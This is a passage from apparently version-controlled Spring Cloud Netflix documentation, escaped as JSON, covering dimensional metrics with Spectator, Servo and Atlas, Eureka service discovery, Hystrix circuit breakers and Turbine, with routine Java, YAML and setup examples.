20,\n \"counter.status.400.root\": 3,\n \"counter.status.200.star-star\": 5\n}\n----\n\nThe first metric gives us a normalized count of successful requests against the root endpoint per unit of time.
But what if the system had 20 endpoints and you want to get a count of successful requests against all the endpoints? Some hierarchical metrics backends would allow you to specify a wild card such as `counter.status.200.*` that would read all 20 metrics and aggregate the results. Alternatively, you could provide a `HandlerInterceptorAdapter` that intercepts and records a metric like `counter.status.200.all` for all successful requests irrespective of the endpoint, but now you must write 20+1 different metrics. Similarly if you want to know the total number of successful requests for all endpoints in the service, you could specify a wild card such as `counter.status.2*.*`.\n\nEven in the presence of wildcarding support on a hierarchical metrics backend, naming consistency can be difficult. Specifically the position of these tags in the name string can slip with time, breaking queries. For example, suppose we add an additional dimension to the hierarchical metrics above for HTTP method. Then `counter.status.200.root` becomes `counter.status.200.method.get.root`, etc. Our `counter.status.200.*` suddenly no longer has the same semantic meaning. Furthermore, if the new dimension is not applied uniformly across the codebase, certain queries may become impossible. This can quickly get out of hand.\n\nNetflix metrics are tagged (a.k.a. dimensional). Each metric has a name, but this single named metric can contain multiple statistics and 'tag' key\/value pairs that allow more querying flexibility. In fact, the statistics themselves are recorded in a special tag.\n\nRecorded with Netflix Servo or Spectator, a timer for the root endpoint described above contains 4 statistics per status code, where the count statistic is identical to Spring Boot Actuator's counter. In the event that we have encountered an HTTP 200 and 400 thus far, there will be 8 available data points:\n\n[source,json]\n----\n{\n \"root(status=200,statistic=count)\": 20,\n \"root(status=200,statistic=max)\": 0.7265630630000001,\n \"root(status=200,statistic=totalOfSquares)\": 0.04759702862580789,\n \"root(status=200,statistic=totalTime)\": 0.2093076914666667,\n \"root(status=400,statistic=count)\": 1,\n \"root(status=400,statistic=max)\": 0,\n \"root(status=400,statistic=totalOfSquares)\": 0,\n \"root(status=400,statistic=totalTime)\": 0\n}\n----\n\n=== Default Metrics Collection\n\nWithout any additional dependencies or configuration, a Spring Cloud based service will autoconfigure a Servo `MonitorRegistry` and begin collecting metrics on every Spring MVC request. By default, a Servo timer with the name `rest` will be recorded for each MVC request which is tagged with:\n\n1. HTTP method\n2. HTTP status (e.g. 200, 400, 500)\n3. URI (or \"root\" if the URI is empty), sanitized for Atlas\n4. The exception class name, if the request handler threw an exception\n5. The caller, if a request header with a key matching `netflix.metrics.rest.callerHeader` is set on the request. There is no default key for `netflix.metrics.rest.callerHeader`. You must add it to your application properties if you wish to collect caller information.\n\nSet the `netflix.metrics.rest.metricName` property to change the name of the metric from `rest` to a name you provide.\n\nIf Spring AOP is enabled and `org.aspectj:aspectjweaver` is present on your runtime classpath, Spring Cloud will also collect metrics on every client call made with `RestTemplate`. A Servo timer with the name of `restclient` will be recorded for each MVC request which is tagged with:\n\n1. HTTP method\n2.
HTTP status (e.g. 200, 400, 500), \"CLIENT_ERROR\" if the response returned null, or \"IO_ERROR\" if an `IOException` occurred during the execution of the `RestTemplate` method\n3. URI, sanitized for Atlas\n4. Client name\n\n[[netflix-metrics-spectator]]\n=== Metrics Collection: Spectator\n\nTo enable Spectator metrics, include a dependency on `spring-cloud-starter-spectator`:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-spectator<\/artifactId>\n <\/dependency>\n----\n\nIn Spectator parlance, a meter is a named, typed, and tagged configuration and a metric represents the value of a given meter at a point in time. Spectator meters are created and controlled by a registry, which currently has several different implementations. Spectator provides 4 meter types: counter, timer, gauge, and distribution summary.\n\nSpring Cloud Spectator integration configures an injectable `com.netflix.spectator.api.Registry` instance for you. Specifically, it configures a `ServoRegistry` instance in order to unify the collection of REST metrics and the exporting of metrics to the Atlas backend under a single Servo API. Practically, this means that your code may use a mixture of Servo monitors and Spectator meters and both will be scooped up by Spring Boot Actuator `MetricReader` instances and both will be shipped to the Atlas backend.\n\n==== Spectator Counter\n\nA counter is used to measure the rate at which some event is occurring.\n\n[source,java]\n----\n\/\/ create a counter with a name and a set of tags\nCounter counter = registry.counter(\"counterName\", \"tagKey1\", \"tagValue1\", ...);\ncounter.increment(); \/\/ increment when an event occurs\ncounter.increment(10); \/\/ increment by a discrete amount\n----\n\nThe counter records a single time-normalized statistic.\n\n==== Spectator Timer\n\nA timer is used to measure how long some event is taking. Spring Cloud automatically records timers for Spring MVC requests and conditionally `RestTemplate` requests, which can later be used to create dashboards for request related metrics like latency:\n\n.Request Latency\nimage::RequestLatency.png []\n\n[source,java]\n----\n\/\/ create a timer with a name and a set of tags\nTimer timer = registry.timer(\"timerName\", \"tagKey1\", \"tagValue1\", ...);\n\n\/\/ execute an operation and time it at the same time\nT result = timer.record(() -> fooReturnsT());\n\n\/\/ alternatively, if you must manually record the time\nlong start = System.nanoTime();\nT result = fooReturnsT();\ntimer.record(System.nanoTime() - start, TimeUnit.NANOSECONDS);\n----\n\nThe timer simultaneously records 4 statistics: count, max, totalOfSquares, and totalTime. The count statistic will always match the single normalized value provided by a counter if you had called `increment()` once on the counter for each time you recorded a timing, so it is rarely necessary to count and time separately for a single operation.\n\nFor link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Timer-Usage#longtasktimer[long running operations], Spectator provides a special `LongTaskTimer`.\n\n==== Spectator Gauge\n\nGauges are used to determine some current value like the size of a queue or number of threads in a running state.
Since gauges are sampled, they provide no information about how these values fluctuate between samples.\n\nThe normal use of a gauge involves registering the gauge once in initialization with an id, a reference to the object to be sampled, and a function to get or compute a numeric value based on the object. The reference to the object is passed in separately and the Spectator registry will keep a weak reference to the object. If the object is garbage collected, then Spectator will automatically drop the registration. See link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Gauge-Usage#using-lambda[the note] in Spectator's documentation about potential memory leaks if this API is misused.\n\n[source,java]\n----\n\/\/ the registry will automatically sample this gauge periodically\nregistry.gauge(\"gaugeName\", pool, Pool::numberOfRunningThreads);\n\n\/\/ manually sample a value in code at periodic intervals -- last resort!\nregistry.gauge(\"gaugeName\", Arrays.asList(\"tagKey1\", \"tagValue1\", ...), 1000);\n----\n\n==== Spectator Distribution Summaries\n\nA distribution summary is used to track the distribution of events. It is similar to a timer, but more general in that the size does not have to be a period of time. For example, a distribution summary could be used to measure the payload sizes of requests hitting a server.\n\n[source,java]\n----\n\/\/ create a distribution summary with a name and a set of tags\nDistributionSummary ds = registry.distributionSummary(\"dsName\", \"tagKey1\", \"tagValue1\", ...);\nds.record(request.sizeInBytes());\n----\n\n[[netflix-metrics-servo]]\n=== Metrics Collection: Servo\n\nWARNING: If your code is compiled on Java 8, please use Spectator instead of Servo as Spectator is destined to replace Servo entirely in the long term.\n\nIn Servo parlance, a monitor is a named, typed, and tagged configuration and a metric represents the value of a given monitor at a point in time. Servo monitors are logically equivalent to Spectator meters. Servo monitors are created and controlled by a `MonitorRegistry`. In spite of the above warning, Servo does have a link:https:\/\/github.com\/Netflix\/servo\/wiki\/Getting-Started[wider array] of monitor options than Spectator has meters.\n\nSpring Cloud integration configures an injectable `com.netflix.servo.MonitorRegistry` instance for you. Once you have created the appropriate `Monitor` type in Servo, the process of recording data is wholly similar to Spectator.\n\n==== Creating Servo Monitors\n\nIf you are using the Servo `MonitorRegistry` instance provided by Spring Cloud (specifically, an instance of `DefaultMonitorRegistry`), Servo provides convenience classes for retrieving link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamiccounter[counters] and link:https:\/\/github.com\/Netflix\/spectator\/wiki\/Servo-Comparison#dynamictimer[timers].
These convenience classes ensure that only one `Monitor` is registered for each unique combination of name and tags.\n\nTo manually create a Monitor type in Servo, especially for the more exotic monitor types for which convenience methods are not provided, instantiate the appropriate type by providing a `MonitorConfig` instance:\n\n[source,java]\n----\nMonitorConfig config = MonitorConfig.builder(\"timerName\").withTag(\"tagKey1\", \"tagValue1\").build();\n\n\/\/ somewhere we should cache this Monitor by MonitorConfig\nTimer timer = new BasicTimer(config);\nmonitorRegistry.register(timer);\n----\n\n[[netflix-metrics-atlas]]\n=== Metrics Backend: Atlas\n\nAtlas was developed by Netflix to manage dimensional time series data for near real-time operational insight. Atlas features in-memory data storage, allowing it to gather and report very large numbers of metrics very quickly.\n\nAtlas captures operational intelligence. Whereas business intelligence is data gathered for analyzing trends over time, operational intelligence provides a picture of what is currently happening within a system.\n\nSpring Cloud provides a `spring-cloud-starter-atlas` that has all the dependencies you need. Then just annotate your Spring Boot application with `@EnableAtlas` and provide a location for your running Atlas server with the `netflix.atlas.uri` property.\n\n==== Global tags\n\nSpring Cloud enables you to add tags to every metric sent to the Atlas backend. Global tags can be used to separate metrics by application name, environment, region, etc.\n\nEach bean implementing `AtlasTagProvider` will contribute to the global tag list:\n\n[source,java]\n----\n@Bean\nAtlasTagProvider atlasCommonTags(\n @Value(\"${spring.application.name}\") String appName) {\n return () -> Collections.singletonMap(\"app\", appName);\n}\n----\n\n==== Using Atlas\n\nTo bootstrap an in-memory standalone Atlas instance:\n\n[source,bash]\n----\n$ curl -LO https:\/\/github.com\/Netflix\/atlas\/releases\/download\/v1.4.2\/atlas-1.4.2-standalone.jar\n$ java -jar atlas-1.4.2-standalone.jar\n----\n\nTIP: An Atlas standalone node running on an r3.2xlarge (61GB RAM) can handle roughly 2 million metrics per minute for a given 6 hour window.\n\nOnce it is running and you have collected a handful of metrics, verify that your setup is correct by listing tags on the Atlas server:\n\n[source,bash]\n----\n$ curl http:\/\/ATLAS\/api\/v1\/tags\n----\n\nTIP: After executing several requests against your service, you can gather some very basic information on the request latency of every request by pasting the following url in your browser: `http:\/\/ATLAS\/api\/v1\/graph?q=name,rest,:eq,:avg`\n\nThe Atlas wiki contains a link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Single-Line[compilation of sample queries] for various scenarios.\n\nMake sure to check out the link:https:\/\/github.com\/Netflix\/atlas\/wiki\/Alerting-Philosophy[alerting philosophy] and docs on using link:https:\/\/github.com\/Netflix\/atlas\/wiki\/DES[double exponential smoothing] to generate dynamic alert thresholds.\n","old_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-netflix\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n= Spring Cloud Netflix\n\ninclude::intro.adoc[]\n\n== Service Discovery: Eureka Clients\n\nService Discovery is one of the key tenets of a microservice based architecture.
Hand configuring each client, or relying on some form of convention, can be very difficult to do and can be very brittle. Eureka is the Netflix Service Discovery Server and Client. The server can be configured and deployed to be highly available, with each server replicating state about the registered services to the others.\n\n=== Registering with Eureka\n\nWhen a client registers with Eureka, it provides meta-data about itself\nsuch as host and port, health indicator URL, home page etc. Eureka\nreceives heartbeat messages from each instance belonging to a service.\nIf the heartbeat fails over a configurable timetable, the instance is\nnormally removed from the registry.\n\nExample Eureka client:\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@RestController\npublic class Application {\n\n @RequestMapping(\"\/\")\n public String home() {\n return \"Hello world\";\n }\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\n(i.e. an utterly normal Spring Boot app). In this example we use\n`@EnableEurekaClient` explicitly, but with only Eureka available you\ncould also use `@EnableDiscoveryClient`. Configuration is required to\nlocate the Eureka server. Example:\n\n\n.application.yml\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n----\n\nwhere \"defaultZone\" is a magic string fallback value that provides the\nservice URL for any client that doesn't express a preference\n(i.e. it's a useful default).\n\nThe default application name (service ID), virtual host and non-secure\nport, taken from the `Environment`, are `${spring.application.name}`,\n`${spring.application.name}` and `${server.port}` respectively.\n\n`@EnableEurekaClient` makes the app into both a Eureka \"instance\"\n(i.e. it registers itself) and a \"client\" (i.e. it can query the\nregistry to locate other services). The instance behaviour is driven\nby `eureka.instance.*` configuration keys, but the defaults will be\nfine if you ensure that your application has a\n`spring.application.name` (this is the default for the Eureka service\nID, or VIP).\n\nSee {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] and {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaClientConfigBean.java[EurekaClientConfigBean] for more details of the configurable options.\n\n=== Authenticating with the Eureka Server\n\nHTTP basic authentication will be automatically added to your eureka\nclient if one of the `eureka.client.serviceUrl.defaultZone` URLs has\ncredentials embedded in it (curl style, like\n`http:\/\/user:password@localhost:8761\/eureka`). For more complex needs\nyou can create a `@Bean` of type `DiscoveryClientOptionalArgs` and\ninject `ClientFilter` instances into it, all of which will be applied\nto the calls from the client to the server.\n\nNOTE: Because of a limitation in Eureka it isn't possible to support\nper-server basic auth credentials, so only the first set that are\nfound will be used.
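For example, to use basic auth with credentials embedded in the service URL (the user\/password values below are placeholders):\n\n.application.yml\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/user:password@localhost:8761\/eureka\/\n----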
=== Status Page and Health Indicator\n\nThe status page and health indicators for a Eureka instance default to\n\"\/info\" and \"\/health\" respectively, which are the default locations of\nuseful endpoints in a Spring Boot Actuator application. You need to\nchange these, even for an Actuator application, if you use a\nnon-default context path or servlet path\n(e.g. `server.servletPath=\/foo`) or management endpoint path\n(e.g. `management.contextPath=\/admin`). Example:\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrlPath: ${management.context-path}\/info\n healthCheckUrlPath: ${management.context-path}\/health\n----\n\nThese links show up in the metadata that is consumed by clients, and\nused in some scenarios to decide whether to send requests to your\napplication, so it's helpful if they are accurate.\n\n=== Registering a Secure Application\n\nIf your app wants to be contacted over HTTPS you can set two flags in\nthe `EurekaInstanceConfig`, _viz_\n`eureka.instance.[nonSecurePortEnabled,securePortEnabled]=[false,true]`\nrespectively. This will make Eureka publish instance information\nshowing an explicit preference for secure communication. The Spring\nCloud `DiscoveryClient` will always return an `https:\/\/...` URI for a\nservice configured this way, and the Eureka (native) instance\ninformation will have a secure health check URL.\n\nBecause of the way\nEureka works internally, it will still publish a non-secure URL for\nstatus and home page unless you also override those explicitly.\nYou can use placeholders to configure the eureka instance urls,\ne.g.\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrl: https:\/\/${eureka.hostname}\/info\n healthCheckUrl: https:\/\/${eureka.hostname}\/health\n homePageUrl: https:\/\/${eureka.hostname}\/\n----\n\n(Note that `${eureka.hostname}` is a native placeholder only available\nin later versions of Eureka. You could achieve the same thing with\nSpring placeholders as well, e.g. using `${eureka.instance.hostName}`.)\n\nNOTE: If your app is running behind a proxy, and the SSL termination\nis in the proxy (e.g. if you run in Cloud Foundry or other platforms\nas a service) then you will need to ensure that the proxy \"forwarded\"\nheaders are intercepted and handled by the application. An embedded\nTomcat container in a Spring Boot app does this automatically if it\nhas explicit configuration for the `X-Forwarded-\*` headers. A sign\nthat you got this wrong will be that the links rendered by your app to\nitself will be wrong (the wrong host, port or protocol).\n\n=== Eureka's Health Checks\n\nBy default, Eureka uses the client heartbeat to determine if a client is up.\nUnless specified otherwise the Discovery Client will not propagate the\ncurrent health check status of the application per the Spring Boot Actuator,\nwhich means that after successful registration Eureka will always announce that the\napplication is in the 'UP' state. This behaviour can be altered by enabling\nEureka health checks, which results in propagating application status\nto Eureka. As a consequence every other application won't send\ntraffic to an application in a state other than 'UP'.\n\n.application.yml\n----\neureka:\n client:\n healthcheck:\n enabled: true\n----\n\nIf you require more control over the health checks, you may consider\nimplementing your own `com.netflix.appinfo.HealthCheckHandler`.
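A minimal sketch of such a handler (the local check here is a hypothetical placeholder):\n\n[source,java,indent=0]\n----\npublic class MyHealthCheckHandler implements HealthCheckHandler {\n\n @Override\n public InstanceInfo.InstanceStatus getStatus(InstanceInfo.InstanceStatus currentStatus) {\n \/\/ report DOWN to Eureka when the local check fails\n return localChecksPass() ? InstanceInfo.InstanceStatus.UP\n : InstanceInfo.InstanceStatus.DOWN;\n }\n\n private boolean localChecksPass() {\n return true; \/\/ placeholder for real checks\n }\n}\n----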
=== Eureka Metadata for Instances and Clients\n\nIt's worth spending a bit of time understanding how the Eureka metadata works, so you can use it in a way that makes sense in your platform. There is standard metadata for things like hostname, IP address, port numbers, status page and health check. These are published in the service registry and used by clients to contact the services in a straightforward way. Additional metadata can be added to the instance registration in the `eureka.instance.metadataMap`, and this will be accessible in the remote clients, but in general will not change the behaviour of the client, unless it is made aware of the meaning of the metadata. There are a couple of special cases described below where Spring Cloud already assigns meaning to the metadata map.\n\n==== Using Eureka on Cloudfoundry\n\nCloudfoundry has a global router so that all instances of the same app have the same hostname (it's the same in other PaaS solutions with a similar architecture). This isn't necessarily a barrier to using Eureka, but if you use the router (recommended, or even mandatory depending on the way your platform was set up), you need to explicitly set the hostname and port numbers (secure or non-secure) so that they use the router. You might also want to use instance metadata so you can distinguish between the instances on the client (e.g. in a custom load balancer). By default, the `eureka.instance.instanceId` is `vcap.application.instance_id`. For example:\n\n.application.yml\n----\neureka:\n instance:\n hostname: ${vcap.application.uris[0]}\n nonSecurePort: 80\n----\n\nDepending on the way the security rules are set up in your Cloudfoundry instance, you might be able to register and use the IP address of the host VM for direct service-to-service calls. This feature is not (yet) available on Pivotal Web Services (https:\/\/run.pivotal.io[PWS]).\n\n==== Using Eureka on AWS\n\nIf the application is planned to be deployed to an AWS cloud, then the Eureka instance will have to be configured to be Amazon aware. This can be done by customizing the {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] the following way:\n\n[source,java,indent=0]\n----\n@Bean\n@Profile(\"!default\")\npublic EurekaInstanceConfigBean eurekaInstanceConfig() {\n EurekaInstanceConfigBean b = new EurekaInstanceConfigBean();\n AmazonInfo info = AmazonInfo.Builder.newBuilder().autoBuild(\"eureka\");\n b.setDataCenterInfo(info);\n return b;\n}\n----\n\n==== Changing the Eureka Instance ID\n\nA vanilla Netflix Eureka instance is registered with an ID that is equal to its host name (i.e. only one service per host). Spring Cloud Eureka provides a sensible default that looks like this: `${spring.cloud.client.hostname}:${spring.application.name}:${spring.application.instance_id:${server.port}}`. For example `myhost:myappname:8080`.\n\nUsing Spring Cloud you can override this by providing a unique identifier in `eureka.instance.instanceId`. For example:\n\n.application.yml\n----\neureka:\n instance:\n instanceId: ${spring.application.name}:${spring.application.instance_id:${random.value}}\n----\n\nWith this metadata, and multiple service instances deployed on\nlocalhost, the random value will kick in there to make the instance\nunique. In Cloudfoundry the `spring.application.instance_id` will be\npopulated automatically in a Spring Boot Actuator application, so the\nrandom value will not be needed.\n\n=== Using the EurekaClient\n\nOnce you have an app that is `@EnableDiscoveryClient` (or `@EnableEurekaClient`) you can use it to\ndiscover service instances from the <<spring-cloud-eureka-server,\nEureka Server>>.
One way to do that is to use the native `com.netflix.discovery.EurekaClient` (as opposed to the Spring Cloud `DiscoveryClient`), e.g.

[source,java,indent=0]
----
@Autowired
private EurekaClient discoveryClient;

public String serviceUrl() {
    InstanceInfo instance = discoveryClient.getNextServerFromEureka("STORES", false);
    return instance.getHomePageUrl();
}
----

[TIP]
====
Don't use the `EurekaClient` in a `@PostConstruct` method or in a `@Scheduled` method (or anywhere the `ApplicationContext` might not be started yet). It is initialized in a `SmartLifecycle` (with `phase=0`), so the earliest you can rely on it being available is in another `SmartLifecycle` with a higher phase.
====

=== Alternatives to the native Netflix EurekaClient

You don't have to use the raw Netflix `EurekaClient`, and usually it is more convenient to use it behind a wrapper of some sort. Spring Cloud has support for <<spring-cloud-feign,Feign>> (a REST client builder) and also <<spring-cloud-ribbon,Spring `RestTemplate`>> using the logical Eureka service identifiers (VIPs) instead of physical URLs. To configure Ribbon with a fixed list of physical servers you can simply set `<client>.ribbon.listOfServers` to a comma-separated list of physical addresses (or hostnames), where `<client>` is the ID of the client.

You can also use the `org.springframework.cloud.client.discovery.DiscoveryClient`, which provides a simple API for discovery clients that is not specific to Netflix, e.g.

[source,java,indent=0]
----
@Autowired
private DiscoveryClient discoveryClient;

public String serviceUrl() {
    List<ServiceInstance> list = discoveryClient.getInstances("STORES");
    if (list != null && !list.isEmpty()) {
        return list.get(0).getUri().toString();
    }
    return null;
}
----

=== Why is it so Slow to Register a Service?

Being an instance also involves a periodic heartbeat to the registry (via the client's `serviceUrl`) with a default duration of 30 seconds. A service is not available for discovery by clients until the instance, the server and the client all have the same metadata in their local cache (so it could take 3 heartbeats). You can change the period using `eureka.instance.leaseRenewalIntervalInSeconds`, and this will speed up the process of getting clients connected to other services. In production it's probably better to stick with the default, because there are some computations internally in the server that make assumptions about the lease renewal period.

[[spring-cloud-eureka-server]]
== Service Discovery: Eureka Server

Example eureka server (e.g. using spring-cloud-starter-eureka-server to set up the classpath):

[source,java,indent=0]
----
@SpringBootApplication
@EnableEurekaServer
public class Application {

    public static void main(String[] args) {
        new SpringApplicationBuilder(Application.class).web(true).run(args);
    }

}
----

The server has a home page with a UI, and HTTP API endpoints per the normal Eureka functionality under `/eureka/*`.
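
If you build with Maven instead, a minimal sketch of the corresponding dependency (assuming the Spring Cloud release train BOM is already imported, as in the Gradle tip below):

[source,xml]
----
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-starter-eureka-server</artifactId>
</dependency>
----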

Eureka background reading: see https://github.com/cfregly/fluxcapacitor/wiki/NetflixOSS-FAQ#eureka-service-discovery-load-balancer[flux capacitor] and https://groups.google.com/forum/?fromgroups#!topic/eureka_netflix/g3p2r7gHnN0[google group discussion].

[TIP]
====
Due to Gradle's dependency resolution rules and the lack of a parent bom feature, simply depending on spring-cloud-starter-eureka-server can cause failures on application startup. To remedy this, the Spring Boot Gradle plugin must be added and the Spring Cloud starter parent bom must be imported like so:

.build.gradle
[source,groovy,indent=0]
----
buildscript {
    dependencies {
        classpath("org.springframework.boot:spring-boot-gradle-plugin:1.3.5.RELEASE")
    }
}

apply plugin: "spring-boot"

dependencyManagement {
    imports {
        mavenBom "org.springframework.cloud:spring-cloud-dependencies:Brixton.RELEASE"
    }
}
----
====

=== High Availability, Zones and Regions

The Eureka server does not have a backend store, but the service instances in the registry all have to send heartbeats to keep their registrations up to date (so this can be done in memory). Clients also have an in-memory cache of eureka registrations (so they don't have to go to the registry for every single request to a service).

By default every Eureka server is also a Eureka client and requires (at least one) service URL to locate a peer. If you don't provide it, the service will run and work, but it will fill your logs with a lot of noise about not being able to register with the peer.

See also <<spring-cloud-ribbon,below for details of Ribbon support>> on the client side for Zones and Regions.

=== Standalone Mode

The combination of the two caches (client and server) and the heartbeats make a standalone Eureka server fairly resilient to failure, as long as there is some sort of monitor or elastic runtime keeping it alive (e.g. Cloud Foundry). In standalone mode, you might prefer to switch off the client side behaviour, so it doesn't keep trying and failing to reach its peers. Example:

.application.yml (Standalone Eureka Server)
----
server:
  port: 8761

eureka:
  instance:
    hostname: localhost
  client:
    registerWithEureka: false
    fetchRegistry: false
    serviceUrl:
      defaultZone: http://${eureka.instance.hostname}:${server.port}/eureka/
----

Notice that the `serviceUrl` is pointing to the same host as the local instance.

=== Peer Awareness

Eureka can be made even more resilient and available by running multiple instances and asking them to register with each other. In fact, this is the default behaviour, so all you need to do to make it work is add a valid `serviceUrl` to a peer, e.g.

.application.yml (Two Peer Aware Eureka Servers)
----
---
spring:
  profiles: peer1
eureka:
  instance:
    hostname: peer1
  client:
    serviceUrl:
      defaultZone: http://peer2/eureka/

---
spring:
  profiles: peer2
eureka:
  instance:
    hostname: peer2
  client:
    serviceUrl:
      defaultZone: http://peer1/eureka/
----

In this example we have a YAML file that can be used to run the same server on 2 hosts (peer1 and peer2) by running it in different Spring profiles. You could use this configuration to test the peer awareness on a single host (there's not much value in doing that in production) by manipulating `/etc/hosts` to resolve the host names. In fact, the `eureka.instance.hostname` is not needed if you are running on a machine that knows its own hostname (it is looked up using `java.net.InetAddress` by default).

You can add multiple peers to a system, and as long as they are all connected to each other by at least one edge, they will synchronize the registrations amongst themselves. If the peers are physically separated (inside a data centre or between multiple data centres) then the system can in principle survive split-brain type failures.
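
As a sketch (host names here are illustrative), a third peer could be added by giving each server the other two service URLs in a comma-separated `defaultZone`:

.application.yml (Three Peer Aware Eureka Servers)
----
---
spring:
  profiles: peer1
eureka:
  instance:
    hostname: peer1
  client:
    serviceUrl:
      defaultZone: http://peer2/eureka/,http://peer3/eureka/

---
spring:
  profiles: peer2
eureka:
  instance:
    hostname: peer2
  client:
    serviceUrl:
      defaultZone: http://peer1/eureka/,http://peer3/eureka/

---
spring:
  profiles: peer3
eureka:
  instance:
    hostname: peer3
  client:
    serviceUrl:
      defaultZone: http://peer1/eureka/,http://peer2/eureka/
----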

=== Prefer IP Address

In some cases, it is preferable for Eureka to advertise the IP addresses of services rather than the hostname. Set `eureka.instance.preferIpAddress` to `true` and, when the application registers with Eureka, it will use its IP address rather than its hostname.

== Circuit Breaker: Hystrix Clients

Netflix has created a library called https://github.com/Netflix/Hystrix[Hystrix] that implements the http://martinfowler.com/bliki/CircuitBreaker.html[circuit breaker pattern]. In a microservice architecture it is common to have multiple layers of service calls.

.Microservice Graph
image::HystrixGraph.png[]

A service failure in the lower level of services can cause cascading failure all the way up to the user. When calls to a particular service reach a certain threshold (in Hystrix the default is 20 failures in a rolling window of 10 seconds), the circuit opens and the call is not made. In cases of error and an open circuit, a fallback can be provided by the developer.

.Hystrix fallback prevents cascading failures
image::HystrixFallback.png[]

Having an open circuit stops cascading failures and allows overwhelmed or failing services time to heal. The fallback can be another Hystrix protected call, static data or a sane empty value. Fallbacks may be chained, so the first fallback makes some other business call, which in turn falls back to static data.

Example boot app:

[source,java,indent=0]
----
@SpringBootApplication
@EnableCircuitBreaker
public class Application {

    public static void main(String[] args) {
        new SpringApplicationBuilder(Application.class).web(true).run(args);
    }

}

@Component
public class StoreIntegration {

    @HystrixCommand(fallbackMethod = "defaultStores")
    public Object getStores(Map<String, Object> parameters) {
        // do stuff that might fail
    }

    public Object defaultStores(Map<String, Object> parameters) {
        return /* something useful */;
    }
}
----

The `@HystrixCommand` is provided by a Netflix contrib library called https://github.com/Netflix/Hystrix/tree/master/hystrix-contrib/hystrix-javanica["javanica"]. Spring Cloud automatically wraps Spring beans with that annotation in a proxy that is connected to the Hystrix circuit breaker. The circuit breaker calculates when to open and close the circuit, and what to do in case of a failure.

To configure the `@HystrixCommand` you can use the `commandProperties` attribute with a list of `@HystrixProperty` annotations. See https://github.com/Netflix/Hystrix/tree/master/hystrix-contrib/hystrix-javanica#configuration[here] for more details. See the https://github.com/Netflix/Hystrix/wiki/Configuration[Hystrix wiki] for details on the properties available.
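
For instance, a sketch that raises the execution timeout for a single command (the property name comes from the Hystrix configuration documentation; `storeService` is a hypothetical collaborator):

[source,java,indent=0]
----
@HystrixCommand(fallbackMethod = "defaultStores",
    commandProperties = {
        @HystrixProperty(name = "execution.isolation.thread.timeoutInMilliseconds", value = "2000")
    })
public Object getStores(Map<String, Object> parameters) {
    // remote call that might be slow
    return storeService.findAll(parameters); // hypothetical collaborator
}
----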

=== Propagating the Security Context or using Spring Scopes

If you want some thread local context to propagate into a `@HystrixCommand`, the default declaration will not work because it executes the command in a thread pool (in case of timeouts). You can switch Hystrix to use the same thread as the caller using some configuration, or directly in the annotation, by asking it to use a different "Isolation Strategy". For example:

[source,java]
----
@HystrixCommand(fallbackMethod = "stubMyService",
    commandProperties = {
        @HystrixProperty(name = "execution.isolation.strategy", value = "SEMAPHORE")
    }
)
...
----

The same thing applies if you are using `@SessionScope` or `@RequestScope`. You will know when you need to do this because of a runtime exception that says it can't find the scoped context.

=== Health Indicator

The state of the connected circuit breakers is also exposed in the `/health` endpoint of the calling application.

[source,json,indent=0]
----
{
    "hystrix": {
        "openCircuitBreakers": [
            "StoreIntegration::getStoresByLocationLink"
        ],
        "status": "CIRCUIT_OPEN"
    },
    "status": "UP"
}
----

=== Hystrix Metrics Stream

To enable the Hystrix metrics stream include a dependency on `spring-boot-starter-actuator`. This will expose `/hystrix.stream` as a management endpoint.

[source,xml]
----
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
----

== Circuit Breaker: Hystrix Dashboard

One of the main benefits of Hystrix is the set of metrics it gathers about each HystrixCommand. The Hystrix Dashboard displays the health of each circuit breaker in an efficient manner.

.Hystrix Dashboard
image::Hystrix.png[]

To run the Hystrix Dashboard annotate your Spring Boot main class with `@EnableHystrixDashboard`. You then visit `/hystrix` and point the dashboard to an individual instance's `/hystrix.stream` endpoint in a Hystrix client application.

=== Turbine

Looking at an individual instance's Hystrix data is not very useful in terms of the overall health of the system. https://github.com/Netflix/Turbine[Turbine] is an application that aggregates all of the relevant `/hystrix.stream` endpoints into a combined `/turbine.stream` for use in the Hystrix Dashboard. Individual instances are located via Eureka. Running Turbine is as simple as annotating your main class with the `@EnableTurbine` annotation (e.g. using spring-cloud-starter-turbine to set up the classpath). All of the documented configuration properties from https://github.com/Netflix/Turbine/wiki/Configuration-(1.x)[the Turbine 1 wiki] apply. The only difference is that the `turbine.instanceUrlSuffix` does not need the port prepended, as this is handled automatically unless `turbine.instanceInsertPort=false`.

The configuration key `turbine.appConfig` is a list of Eureka serviceIds that Turbine will use to look up instances. The Turbine stream is then used in the Hystrix dashboard with a URL that looks like `http://my.turbine.server:8080/turbine.stream?cluster=<CLUSTERNAME>` (the cluster parameter can be omitted if the name is "default"). The `cluster` parameter must match an entry in `turbine.aggregator.clusterConfig`. Values returned from Eureka are uppercase, thus we expect this example to work if there is an app registered with Eureka called "customers":

----
turbine:
  aggregator:
    clusterConfig: CUSTOMERS
  appConfig: customers
----

